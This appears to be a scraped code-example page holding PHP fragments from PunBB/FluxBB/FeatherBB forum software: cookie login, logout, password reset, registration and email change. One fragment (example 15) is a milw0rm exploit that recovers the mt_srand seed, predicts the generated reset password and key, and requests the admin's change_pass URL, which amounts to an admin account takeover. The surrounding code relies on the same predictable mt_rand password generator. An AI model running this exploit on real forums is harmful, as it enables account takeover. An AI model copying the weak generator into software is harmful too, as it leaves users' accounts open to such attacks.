        // Check if there's a user with the user ID and password hash from the cookie
        $result = $db->query('SELECT u.*, g.*, o.logged, o.idle FROM ' . $db->prefix . 'users AS u INNER JOIN ' . $db->prefix . 'groups AS g ON u.group_id=g.g_id LEFT JOIN ' . $db->prefix . 'online AS o ON o.user_id=u.id WHERE u.id=' . intval($cookie['user_id'])) or error('Impossible de retrouver les informations utilisateur', __FILE__, __LINE__, $db->error());
        $pun_user = $db->fetch_assoc($result);
        // If user authorisation failed
        if (!isset($pun_user['id']) || md5($cookie_seed . $pun_user['password']) !== $cookie['password_hash']) {
            pun_setcookie(0, random_pass(8), $expire);
            set_default_user();
            return;
        }
        // Set a default language if the user selected language no longer exists
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        // Set a default style if the user selected style no longer exists
        if (!@file_exists(PUN_ROOT . 'style/' . $pun_user['style'] . '.css')) {
            $pun_user['style'] = $pun_config['o_default_style'];
        }
        if (!$pun_user['disp_topics']) {
            $pun_user['disp_topics'] = $pun_config['o_disp_topics_default'];
        }
        if (!$pun_user['disp_posts']) {
            $pun_user['disp_posts'] = $pun_config['o_disp_posts_default'];
        }
        if ($pun_user['save_pass'] == '0') {
            $expire = 0;
        }
        if ($pun_user['read_topics']) {
            $pun_user['read_topics'] = unserialize($pun_user['read_topics']);
        } else {
            $pun_user['read_topics'] = array();
        }
        // Define this if you want this visit to affect the online list and the users last visit data
        if (!defined('PUN_QUIET_VISIT')) {
            // Update the online list
            if (!$pun_user['logged']) {
                $db->query('INSERT INTO ' . $db->prefix . 'online (user_id, ident, logged) SELECT ' . $pun_user['id'] . ', \'' . $db->escape($pun_user['username']) . '\', ' . $now . ' FROM ' . $db->prefix . 'users WHERE id = ' . $pun_user['id'] . ' AND NOT EXISTS (SELECT 1 FROM ' . $db->prefix . 'online WHERE user_id = ' . $pun_user['id'] . ')') or error('Impossible d\'insérer un élément dans la liste des utilisateurs en ligne', __FILE__, __LINE__, $db->error());
            } else {
                // Special case: We've timed out, but no other user has browsed the forums since we timed out
                if ($pun_user['logged'] < $now - $pun_config['o_timeout_visit']) {
                    $db->query('UPDATE ' . $db->prefix . 'users SET last_visit=' . $pun_user['logged'] . ', read_topics=NULL WHERE id=' . $pun_user['id']) or error('Impossible de mettre à jour les données de visite de l\'utilisateur', __FILE__, __LINE__, $db->error());
                    $pun_user['last_visit'] = $pun_user['logged'];
                }
                $idle_sql = $pun_user['idle'] == '1' ? ', idle=0' : '';
                $db->query('UPDATE ' . $db->prefix . 'online SET logged=' . $now . $idle_sql . ' WHERE user_id=' . $pun_user['id']) or error('Impossible de mettre à jour la liste des utilisateurs en ligne', __FILE__, __LINE__, $db->error());
            }
        }
        $pun_user['is_guest'] = false;
    } else {
        set_default_user();
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        if ($pun_user['read_topics']) {
            $pun_user['read_topics'] = array();
        }
    }
}
Esempio n. 13
0
 /**
  * remove fluxbb cookie on logout
  */
 function logOff()
 {
     global $pun_user;
     $pun_user = array();
     $pun_user['is_guest'] = 1;
     pun_setcookie(1, random_pass(8), time() + 31536000);
 }
Esempio n. 14
0
     $result = $db->query('SELECT id, username FROM ' . $db->prefix . 'users WHERE email=\'' . $db->escape($email) . '\'') or error('Unable to fetch user info', __FILE__, __LINE__, $db->error());
     if ($db->num_rows($result)) {
         // Load the "activate password" template
         $mail_tpl = trim(file_get_contents(PUN_ROOT . 'lang/' . $pun_user['language'] . '/mail_templates/activate_password.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         // Do the generic replacements first (they apply to all e-mails sent out here)
         $mail_message = str_replace('<base_url>', $pun_config['o_base_url'] . '/', $mail_message);
         $mail_message = str_replace('<board_mailer>', $pun_config['o_board_title'] . ' ' . $lang_common['Mailer'], $mail_message);
         // Loop through users we found
         while ($cur_hit = $db->fetch_assoc($result)) {
             // Generate a new password and a new password activation code
             $new_password = random_pass(8);
             $new_password_key = random_pass(8);
             $db->query('UPDATE ' . $db->prefix . 'users SET activate_string=\'' . pun_hash($new_password) . '\', activate_key=\'' . $new_password_key . '\' WHERE id=' . $cur_hit['id']) or error('Unable to update activation data', __FILE__, __LINE__, $db->error());
             // Do the user specific replacements to the template
             $cur_mail_message = str_replace('<username>', $cur_hit['username'], $mail_message);
             $cur_mail_message = str_replace('<activation_url>', $pun_config['o_base_url'] . '/profile.php?id=' . $cur_hit['id'] . '&action=change_pass&key=' . $new_password_key, $cur_mail_message);
             $cur_mail_message = str_replace('<new_password>', $new_password, $cur_mail_message);
             pun_mail($email, $mail_subject, $cur_mail_message);
         }
         message($lang_login['Forget mail'] . ' <a href="mailto:' . $pun_config['o_admin_email'] . '">' . $pun_config['o_admin_email'] . '</a>.');
     } else {
         message($lang_login['No e-mail match'] . ' ' . $email . '.');
     }
 }
 $page_title = pun_htmlspecialchars($pun_config['o_board_title']) . ' / ' . $lang_login['Request pass'];
 $required_fields = array('req_email' => $lang_common['E-mail']);
 $focus_element = array('request_pass', 'req_email');
Esempio n. 15
0
printf("Seed : %s\n--\n", SEED);
for ($p = 0; $p < 1000000; $p++) {
    if (!($p % 300)) {
        echo $chars[$p / 300 % 4] . "\r";
    }
    mt_srand((double) $p);
    if (strcmp(md5(SEED . random_pass(8)), MD5_NOT_LOGGUED) == 0) {
        define('SRAND', $p);
        break;
    }
}
printf("SRAND : %s\n--\n", SRAND);
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL . '/profile.php?id=2&action=change_pass&key=' . random_pass(8);
// Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_exec($h);
function random_pass($len)
{
    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $password = '';
    for ($i = 0; $i < $len; ++$i) {
        $password .= substr($chars, mt_rand() % strlen($chars), 1);
    }
    return $password;
}
# milw0rm.com [2008-02-21]
Esempio n. 16
0
$errors = array();
if (isset($_POST['form_sent'])) {
    // Check that someone from this IP didn't register a user within the last hour (DoS prevention)
    $query = $db->select(array('one' => '1'), 'users AS u');
    $query->where = 'u.registration_ip = :remote_addr AND u.registered > :last_hour';
    $params = array(':remote_addr' => get_remote_address(), ':last_hour' => time() - 3600);
    $result = $query->run($params);
    if (!empty($result)) {
        message($lang->t('Registration flood'));
    }
    unset($result, $query, $params);
    $username = pun_trim($_POST['req_user']);
    $email1 = strtolower(trim($_POST['req_email1']));
    if ($pun_config['o_regs_verify'] == '1') {
        $email2 = strtolower(trim($_POST['req_email2']));
        $password1 = random_pass(8);
        $password2 = $password1;
    } else {
        $password1 = pun_trim($_POST['req_password1']);
        $password2 = pun_trim($_POST['req_password2']);
    }
    // Validate username and passwords
    check_username($username);
    if (pun_strlen($password1) < 4) {
        $errors[] = $lang->t('Pass too short');
    } else {
        if ($password1 != $password2) {
            $errors[] = $lang->t('Pass not match');
        }
    }
    // Validate email
Esempio n. 17
0
 public function change_email($id)
 {
     global $lang_profile, $lang_common, $lang_prof_reg;
     // Make sure we are allowed to change this user's email
     if ($this->user->id != $id) {
         if (!$this->user->is_admmod) {
             // A regular user trying to change another user's email?
             message($lang_common['No permission'], '403');
         } elseif ($this->user->g_moderator == '1') {
             // A moderator trying to change a user's email?
             $select_change_mail = array('u.group_id', 'g.g_moderator');
             $user = DB::for_table('users')->table_alias('u')->select_many($select_change_mail)->inner_join('groups', array('g.g_id', '=', 'u.group_id'), 'g')->where('u.id', $id)->find_one();
             if (!$user) {
                 message($lang_common['Bad request'], '404');
             }
             if ($this->user->g_mod_edit_users == '0' || $this->user->g_mod_change_passwords == '0' || $user['group_id'] == FEATHER_ADMIN || $user['g_moderator'] == '1') {
                 message($lang_common['No permission'], '403');
             }
         }
     }
     if ($this->request->get('key')) {
         $key = $this->request->get('key');
         $new_email_key = DB::for_table('users')->where('id', $id)->find_one_col('activate_key');
         if ($key == '' || $key != $new_email_key) {
             message($lang_profile['Email key bad'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.');
         } else {
             DB::for_table('users')->where('id', $id)->find_one()->set_expr('email', 'activate_string')->set_expr('activate_string', 'NULL')->set_expr('activate_key', 'NULL')->save();
             message($lang_profile['Email updated'], true);
         }
     } elseif ($this->request->isPost()) {
         if (feather_hash($this->request->post('req_password')) !== $this->user->password) {
             message($lang_profile['Wrong pass']);
         }
         require FEATHER_ROOT . 'include/email.php';
         // Validate the email address
         $new_email = strtolower(feather_trim($this->request->post('req_new_email')));
         if (!is_valid_email($new_email)) {
             message($lang_common['Invalid email']);
         }
         // Check if it's a banned email address
         if (is_banned_email($new_email)) {
             if ($this->config['p_allow_banned_email'] == '0') {
                 message($lang_prof_reg['Banned email']);
             } elseif ($this->config['o_mailing_list'] != '') {
                 // Load the "banned email change" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/banned_email_change.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 $mail_message = str_replace('<username>', $this->user->username, $mail_message);
                 $mail_message = str_replace('<email>', $new_email, $mail_message);
                 $mail_message = str_replace('<profile_url>', get_link('user/' . $id . '/'), $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 pun_mail($this->config['o_mailing_list'], $mail_subject, $mail_message);
             }
         }
         // Check if someone else already has registered with that email address
         $select_change_mail = array('id', 'username');
         $result = DB::for_table('users')->select_many($select_change_mail)->where('email', $new_email)->find_many();
         if ($result) {
             if ($this->config['p_allow_dupe_email'] == '0') {
                 message($lang_prof_reg['Dupe email']);
             } elseif ($this->config['o_mailing_list'] != '') {
                 foreach ($result as $cur_dupe) {
                     $dupe_list[] = $cur_dupe['username'];
                 }
                 // Load the "dupe email change" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/dupe_email_change.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 $mail_message = str_replace('<username>', $this->user->username, $mail_message);
                 $mail_message = str_replace('<dupe_list>', implode(', ', $dupe_list), $mail_message);
                 $mail_message = str_replace('<profile_url>', get_link('user/' . $id . '/'), $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 pun_mail($this->config['o_mailing_list'], $mail_subject, $mail_message);
             }
         }
         $new_email_key = random_pass(8);
         // Update the user
         $update_user = array('activate_string' => $new_email, 'activate_key' => $new_email_key);
         DB::for_table('users')->where('id', tid)->find_one()->set($update_user)->save();
         // Load the "activate email" template
         $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/activate_email.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         $mail_message = str_replace('<username>', $this->user->username, $mail_message);
         $mail_message = str_replace('<base_url>', get_base_url(), $mail_message);
         $mail_message = str_replace('<activation_url>', get_link('user/' . $id . '/action/change_email/?key=' . $new_email_key), $mail_message);
         $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
         pun_mail($new_email, $mail_subject, $mail_message);
         message($lang_profile['Activate email sent'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.', true);
     }
 }